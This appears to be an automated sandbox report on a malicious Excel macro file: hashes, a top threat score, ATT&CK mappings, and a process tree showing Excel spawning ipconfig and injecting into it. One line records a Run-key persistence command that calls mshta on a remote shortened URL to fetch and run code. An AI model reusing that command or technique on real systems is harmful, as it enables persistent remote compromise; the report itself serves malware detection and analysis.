5b4314edaf2c1bc2e8edb57d84d9249ec97980bbf2d345859f66351d40995305

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
28-09-2024 13:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

stage1-macro.xls
Size

36KB
MD5

0f49e06aaab8816a9d95815e749fb291
SHA1

e124c99646e1d7fa682e465630eda2159172dcb1
SHA256

f5190d29af5ba58c45b138751593e2f5ed014d42e5c37f05f6ea98ee8838c9e2
SHA512

c09fa102c120b8e3cd7cddd88fa7d228f551be6ba81727bff8dbab84520bc7e456e82288fa91a86d18b9447fe3e2e866fc2dc4733d19b84666a4cdbfb50308e0
SSDEEP

384:AGF3dXzjwE8qUGiKu7kriCj1wnb9uCFtw5HNqldMbhuDBfrgfXGvmeeernB/:VdDD8qji/7GikKu0YHT9vv

Score

10^/10

discovery persistence

Malware Config

Signatures

Process spawned unexpected child process 10 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2772	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2756	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2816	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2028	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2792	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2776	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2900	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2940	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2892	2640	ipconfig.exe	30
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1788	2640	ipconfig.exe	30

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\fgiopoiuytresdfgh = "\"mshta\"\"http:\\\\j.mp\\fgiopoiuytresdfgh\""	EXCEL.EXE

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Gathers network information 2 TTPs 10 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2772	ipconfig.exe
2028	ipconfig.exe
2792	ipconfig.exe
2940	ipconfig.exe
2892	ipconfig.exe
1788	ipconfig.exe
2756	ipconfig.exe
2816	ipconfig.exe
2776	ipconfig.exe
2900	ipconfig.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2640	EXCEL.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2640	EXCEL.EXE
2640	EXCEL.EXE
2640	EXCEL.EXE

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 2792	2640	EXCEL.EXE	31
PID 2640 wrote to memory of 2792	2640	EXCEL.EXE	31
PID 2640 wrote to memory of 2792	2640	EXCEL.EXE	31
PID 2640 wrote to memory of 2792	2640	EXCEL.EXE	31
PID 2640 wrote to memory of 2028	2640	EXCEL.EXE	32
PID 2640 wrote to memory of 2028	2640	EXCEL.EXE	32
PID 2640 wrote to memory of 2028	2640	EXCEL.EXE	32
PID 2640 wrote to memory of 2028	2640	EXCEL.EXE	32
PID 2640 wrote to memory of 2816	2640	EXCEL.EXE	33
PID 2640 wrote to memory of 2816	2640	EXCEL.EXE	33
PID 2640 wrote to memory of 2816	2640	EXCEL.EXE	33
PID 2640 wrote to memory of 2816	2640	EXCEL.EXE	33
PID 2640 wrote to memory of 2756	2640	EXCEL.EXE	34
PID 2640 wrote to memory of 2756	2640	EXCEL.EXE	34
PID 2640 wrote to memory of 2756	2640	EXCEL.EXE	34
PID 2640 wrote to memory of 2756	2640	EXCEL.EXE	34
PID 2640 wrote to memory of 2772	2640	EXCEL.EXE	35
PID 2640 wrote to memory of 2772	2640	EXCEL.EXE	35
PID 2640 wrote to memory of 2772	2640	EXCEL.EXE	35
PID 2640 wrote to memory of 2772	2640	EXCEL.EXE	35
PID 2640 wrote to memory of 2776	2640	EXCEL.EXE	36
PID 2640 wrote to memory of 2776	2640	EXCEL.EXE	36
PID 2640 wrote to memory of 2776	2640	EXCEL.EXE	36
PID 2640 wrote to memory of 2776	2640	EXCEL.EXE	36
PID 2640 wrote to memory of 2900	2640	EXCEL.EXE	37
PID 2640 wrote to memory of 2900	2640	EXCEL.EXE	37
PID 2640 wrote to memory of 2900	2640	EXCEL.EXE	37
PID 2640 wrote to memory of 2900	2640	EXCEL.EXE	37
PID 2640 wrote to memory of 2940	2640	EXCEL.EXE	38
PID 2640 wrote to memory of 2940	2640	EXCEL.EXE	38
PID 2640 wrote to memory of 2940	2640	EXCEL.EXE	38
PID 2640 wrote to memory of 2940	2640	EXCEL.EXE	38
PID 2640 wrote to memory of 2892	2640	EXCEL.EXE	39
PID 2640 wrote to memory of 2892	2640	EXCEL.EXE	39
PID 2640 wrote to memory of 2892	2640	EXCEL.EXE	39
PID 2640 wrote to memory of 2892	2640	EXCEL.EXE	39
PID 2640 wrote to memory of 1788	2640	EXCEL.EXE	40
PID 2640 wrote to memory of 1788	2640	EXCEL.EXE	40
PID 2640 wrote to memory of 1788	2640	EXCEL.EXE	40
PID 2640 wrote to memory of 1788	2640	EXCEL.EXE	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\stage1-macro.xls
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2792
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2028
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2816
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2756
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2772
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2776
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2900
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2940
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:2892
- C:\Windows\SysWOW64\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Gathers network information
  PID:1788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2640-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2640-1-0x00000000727CD000-0x00000000727D8000-memory.dmp

Filesize
44KB

Download
memory/2640-2-0x00000000727CD000-0x00000000727D8000-memory.dmp

Filesize
44KB

Download
memory/2640-3-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2640-11-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2640-10-0x0000000006200000-0x0000000006300000-memory.dmp

Filesize
1024KB

Download
memory/2640-9-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2640-7-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2640-4-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2640-8-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2640-12-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2640-13-0x00000000727CD000-0x00000000727D8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads